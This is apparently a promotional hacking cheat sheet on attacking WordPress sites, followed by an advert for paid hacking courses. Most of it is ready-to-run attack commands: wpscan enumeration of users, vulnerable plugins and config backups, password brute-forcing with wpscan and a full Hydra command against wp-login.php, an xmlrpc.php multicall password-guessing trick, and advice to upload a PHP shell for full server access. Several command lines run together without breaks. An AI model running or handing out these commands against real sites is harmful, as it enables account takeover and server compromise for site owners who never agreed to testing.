WordPress powers 43% of ALL websites on the internet, making it the #1 target for hackers.
wpscan --url https://target.com --enumerate u,vp,vt,cb
# u = users, vp = vulnerable plugins, vt = themes, cb = config backupswpscan --url target --enumerate vp
# Check exploit-db.com for plugin exploits
searchsploit "wordpress plugin_name"wpscan --url target --passwords rockyou.txt --usernames admin
# Or with Hydra:
hydra -l admin -P wordlist.txt target http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=incorrect"curl -X POST https://target/xmlrpc.php -d 'system.multicall ... '
# Test hundreds of passwords in a single request!Plugins with file upload → upload PHP shell → full server access.
Subscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!